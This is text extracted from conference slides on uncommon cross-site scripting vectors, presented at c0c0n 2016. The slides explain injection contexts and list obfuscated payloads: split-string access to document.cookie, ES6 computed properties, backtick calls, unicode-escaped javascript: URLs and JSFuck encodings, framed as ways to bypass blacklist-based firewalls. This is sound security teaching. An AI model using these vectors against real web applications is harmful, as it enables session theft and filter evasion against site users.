ESOTERIC XSS PAYLOADS c0c0n2016 @riyazwalikar @wincmdfu RIYAZ WALIKAR Chief Offensive Security Officer @Appsecco Security evangelist, leader for null Bangalore and OWASP chapters Trainer/Speaker : BlackHat, defcon, nullcon, c0c0n, OWASP AppSec USA Twitter : @riyazwalikar and @wincmdfu http://ibreak.so�ware WHAT IS THIS TALK ABOUT? Quick contexts Uncommon XSS vectors WHAT ARE INJECTION CONTEXTS?
Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page would depend on the context in which the browser tries to interpret the user input.
Lavakumar Kuppan, IronWASP 3 MOST COMMON INJECTION CONTEXTS HTML context HTML Element context Script context HTML CONTEXT
Welcome user_tainted_input! HTML ELEMENT CONTEXT
Welcome bob! SCRIPT CONTEXT
Welcome bob!
Common vectors?
Multiple ways of representation document.cookie document['cookie'] document['coo'+'kie'] eval('doc'+'ument')['coo'+ 'kie'] Autoscrolling the page
...
New HTML Elements
Using the embed tag
Overwriting the ReferenceError object
ES6 Computed properties
({[alert(1)]: 1})
({[eval('ale'+'rt')(0)]: 1 }) Back ticks FTW! No enclosing brackets required: alert `1`
Expansion of \u{61} and backticks loc\u{61}tion=j\u{61}vascript:alert`1` Prototyping the .toString() method
Object.prototype[Symbol.toStringTag]=''; location='javascript:1+{}' JSFUCK JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code - ()+[]!
false => ![] true => !![] undefined => [][[]] NaN => +[![]] 0 => +[] 1 => +!+[] 2 => !+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean => ![] Function => []["filter"] eval => []["filter"]["constructor"]( CODE )() window => []["filter"]["constructor"]("return this")() alert(0)
(![]+[])[1]+(![]+[])[2]+(![]+[])[4]+(!![]+[])[1]+(!![]+[])[0]+"(0)"
The ES6 specification coupled with new HTML 5 elements and event handlers can be used to bypass most blacklist based web application firewalls. A lot of active research has been done in this area by @0x6D6172696F and the good folks at cure53 Q & A http://ibreak.so�ware @riyazwalikar @wincmdfu REFERENCES: http://blog.ironwasp.org/2014/07/contexts-and-cross- site-scripting-brief.html https://github.com/riyazwalikar/simplexssapp https://html5sec.org/ http://www.jsfuck.com/ http://blog.innerht.ml/cascading-style-scripting https://cure53.de/es6-for-penetration-testers.pdf